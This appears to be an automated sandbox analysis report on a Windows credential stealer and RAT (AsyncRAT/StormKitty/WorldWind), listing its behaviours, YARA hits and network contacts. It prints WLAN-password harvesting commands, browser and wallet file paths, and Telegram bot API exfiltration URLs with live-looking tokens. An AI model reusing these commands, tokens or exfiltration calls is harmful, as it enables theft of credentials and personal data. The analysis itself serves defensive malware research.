Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 596489	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 595872	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 595688	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 99888	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 99765	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 99656	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 99546	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 99437	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 99328	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 99218	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 99109	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 98997	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 98875	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 98761	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 98640	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 98531	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 98421	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 98312	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 98203	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 98092	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 97968	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 97858	Jump to behavior

Source: tmpE197.tmp.dat.0.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: tmpE197.tmp.dat.0.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: tmpE197.tmp.dat.0.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: tmpE197.tmp.dat.0.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: tmpE197.tmp.dat.0.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: tmpE197.tmp.dat.0.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: tmpE197.tmp.dat.0.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: tmpE197.tmp.dat.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: tmpE197.tmp.dat.0.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: tmpE197.tmp.dat.0.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: tmpE197.tmp.dat.0.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: tmpE197.tmp.dat.0.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: tmpE197.tmp.dat.0.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: tmpE197.tmp.dat.0.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: tmpE197.tmp.dat.0.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: tmpE197.tmp.dat.0.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: tmpE197.tmp.dat.0.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: Client.exe	Binary or memory string: vmware
Source: tmpE197.tmp.dat.0.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: tmpE197.tmp.dat.0.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: tmpE197.tmp.dat.0.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: tmpE197.tmp.dat.0.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: tmpE197.tmp.dat.0.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: tmpE197.tmp.dat.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: tmpE197.tmp.dat.0.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: tmpE197.tmp.dat.0.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: tmpE197.tmp.dat.0.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: tmpE197.tmp.dat.0.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: tmpE197.tmp.dat.0.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: tmpE197.tmp.dat.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: Client.exe	Binary or memory string: VMwareVBox
Source: tmpE197.tmp.dat.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: tmpE197.tmp.dat.0.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: Client.exe, 00000000.00000002.4570056376.00000000055D3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllssC:\Windows\system32\svchost.exe

Source: C:\Users\user\Desktop\Client.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Client.exe

Code function: 0_2_05C70B20 LdrInitializeThunk,

0_2_05C70B20

Source: C:\Users\user\Desktop\Client.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Client.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\Client.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid	Jump to behavior

Language, Device and Operating System Detection

Yara detected Telegram Recon

Source: Yara match

File source: Client.exe, type: SAMPLE

Source: C:\Users\user\Desktop\Client.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId

Jump to behavior

Source: C:\Users\user\Desktop\Client.exe	Queries volume information: C:\Users\user\Desktop\Client.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Client.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected AsyncRAT

Source: Yara match	File source: Client.exe, type: SAMPLE
Source: Yara match	File source: 0.0.Client.exe.d00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Client.exe PID: 6940, type: MEMORYSTR

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile

Source: Client.exe, 00000000.00000002.4570320604.0000000005E21000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\Client.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected StormKitty Stealer

Source: Yara match	File source: Client.exe, type: SAMPLE
Source: Yara match	File source: 0.0.Client.exe.d00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4562681336.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Client.exe PID: 6940, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: Client.exe, type: SAMPLE
Source: Yara match	File source: 0.0.Client.exe.d00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4562681336.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Client.exe PID: 6940, type: MEMORYSTR

Yara detected WorldWind Stealer

Source: Yara match	File source: Client.exe, type: SAMPLE
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 0.0.Client.exe.d00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.4562681336.0000000003101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4562681336.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Client.exe PID: 6940, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Client.exe, 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: Electrum#\Electrum\wallets
Source: Client.exe, 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: \bytecoinJaxxk\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
Source: Client.exe, 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: Exodus+\Exodus\exodus.wallet
Source: Client.exe, 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: Ethereum%\Ethereum\keystore
Source: Client.exe, 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: Exodus+\Exodus\exodus.wallet
Source: Client.exe, 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: Ethereum%\Ethereum\keystore
Source: Client.exe, 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: Coinomi1\Coinomi\Coinomi\wallets
Source: Client.exe, 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: Ethereum%\Ethereum\keystore

Tries to harvest and steal WLAN passwords

Source: C:\Users\user\Desktop\Client.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Users\user\Desktop\Client.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile	Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Client.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior

Source: Yara match	File source: Client.exe, type: SAMPLE
Source: Yara match	File source: 0.0.Client.exe.d00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4562681336.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Client.exe PID: 6940, type: MEMORYSTR

Remote Access Functionality

Yara detected StormKitty Stealer

Source: Yara match	File source: Client.exe, type: SAMPLE
Source: Yara match	File source: 0.0.Client.exe.d00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4562681336.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Client.exe PID: 6940, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: Client.exe, type: SAMPLE
Source: Yara match	File source: 0.0.Client.exe.d00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4562681336.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Client.exe PID: 6940, type: MEMORYSTR

Yara detected WorldWind Stealer

Source: Yara match	File source: Client.exe, type: SAMPLE
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 0.0.Client.exe.d00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.4562681336.0000000003101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4562681336.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Client.exe PID: 6940, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	131 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	11 Process Injection	111 Obfuscated Files or Information	1 Input Capture	134 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	Logon Script (Windows)	1 Scheduled Task/Job	1 Timestomp	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Screen Capture	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	341 Security Software Discovery	Distributed Component Object Model	1 Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	1 Process Discovery	SSH	Keylogging	4 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	251 Virtualization/Sandbox Evasion	Cached Domain Credentials	251 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Process Injection	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Client.exe	82%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno
Client.exe	89%	Virustotal		Browse
Client.exe	100%	Avira	HEUR/AGEN.1307527
Client.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
api.mylnikov.org	3%	Virustotal	Browse
api.telegram.org	2%	Virustotal	Browse
icanhazip.com	0%	Virustotal	Browse
72.245.12.0.in-addr.arpa	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://support.mozilla.org	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13	0%	Avira URL Cloud	safe
https://api.telegram.org/bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendMessage?chat_id=16191	0%	Avira URL Cloud	safe
https://api.telegram.org	0%	Avira URL Cloud	safe
https://api.telegram.org/bot	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=1096	0%	Avira URL Cloud	safe
https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15	0%	Avira URL Cloud	safe
https://api.telegram.org	1%	Virustotal		Browse
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Virustotal		Browse
https://api.telegram.org/bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendMessage?chat_id=1619136628&text=%F0%9F%93%81%20Uploading%20Log%20Folders...	0%	Avira URL Cloud	safe
https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13	9%	Virustotal		Browse
https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/send	0%	Avira URL Cloud	safe
https://api.telegram.org/bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendDocument?chat_id=1619	0%	Avira URL Cloud	safe
https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=1096	2%	Virustotal		Browse
https://api.telegram.orgD	0%	Avira URL Cloud	safe
https://api.telegram.org/bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendMessage?chat_id=16191	2%	Virustotal		Browse
https://api.telegram.org/bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendMessage?chat_id=1619136628&text=%F0%9F%93%81%20Uploading%20Log%20Folders...	1%	Virustotal		Browse
http://icanhazip.com/	0%	Avira URL Cloud	safe
https://api.telegram.org/bot	1%	Virustotal		Browse
https://api.telegram.org/bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendDocument?chat_id=1619136628	0%	Avira URL Cloud	safe
https://github.com/LimerBoy/StormKitty	0%	Avira URL Cloud	safe
https://api.telegram.org/bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendMessage?chat_id=1619136628&text=%0A%20%20%F0%9F%8C%AA%20WorldWind%20Stealer%202.0.4%20-%20Results:%0ADate:%202024-08-30%201:14:00%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20849224%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20Hardware:%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20MKX85XX%0ARAM:%204095MB%0AHWID:%20B98BC19D7D%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20Network:%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20Domains%20info:%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20Bank%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20Crypto%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20Freaky%20Logs%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20Logs:%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20Software:%0A%0A%20%20%F0%9F%A7%AD%20Device:%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20File%20Grabber:%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2060%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2040%0A%0A%20%20Contact%20Developer:%20@FlatLineStealer%0A%20%20%20Join%20The%20Telegram%20Channel:%20@CashOutGangTalk&parse_mode=Markdown&disable_web_page_preview=True	0%	Avira URL Cloud	safe
https://github.com/LimerBoy/StormKitty0&	0%	Avira URL Cloud	safe
https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/send	2%	Virustotal		Browse
https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=1096425866	0%	Avira URL Cloud	safe
https://api.telegram.org/bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendDocument?chat_id=1619	2%	Virustotal		Browse
https://github.com/LimerBoy/StormKitty	2%	Virustotal		Browse
http://api.telegram.orgd	0%	Avira URL Cloud	safe
http://icanhazip.com/	0%	Virustotal		Browse
https://api.telegram.org/file/bot	0%	Avira URL Cloud	safe
http://api.telegram.org	0%	Avira URL Cloud	safe
https://api.telegram.org/bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendDocument?chat_id=1619136628	1%	Virustotal		Browse
https://api.telegram.org/file/bot	0%	Virustotal		Browse
http://api.telegram.org	2%	Virustotal		Browse
https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=1096425866	2%	Virustotal		Browse
https://github.com/LimerBoy/StormKitty0&	2%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.mylnikov.org	172.67.196.114	true	false	3%, Virustotal, Browse	unknown
api.telegram.org	149.154.167.220	true	true	2%, Virustotal, Browse	unknown
icanhazip.com	104.16.185.241	true	false	0%, Virustotal, Browse	unknown
72.245.12.0.in-addr.arpa	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendMessage?chat_id=1619136628&text=%F0%9F%93%81%20Uploading%20Log%20Folders...	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://icanhazip.com/	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.telegram.org/bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendDocument?chat_id=1619136628	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.telegram.org/bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendMessage?chat_id=1619136628&text=%0A%20%20%F0%9F%8C%AA%20WorldWind%20Stealer%202.0.4%20-%20Results:%0ADate:%202024-08-30%201:14:00%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20849224%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20Hardware:%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20MKX85XX%0ARAM:%204095MB%0AHWID:%20B98BC19D7D%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20Network:%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20Domains%20info:%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20Bank%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20Crypto%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20Freaky%20Logs%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20Logs:%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20Software:%0A%0A%20%20%F0%9F%A7%AD%20Device:%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20File%20Grabber:%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2060%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2040%0A%0A%20%20Contact%20Developer:%20@FlatLineStealer%0A%20%20%20Join%20The%20Telegram%20Channel:%20@CashOutGangTalk&parse_mode=Markdown&disable_web_page_preview=True	true	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=1096425866	true	2%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	tmpE154.tmp.dat.0.dr, tmpE186.tmp.dat.0.dr	false	URL Reputation: safe URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	tmpE154.tmp.dat.0.dr, tmpE186.tmp.dat.0.dr	false	URL Reputation: safe	unknown
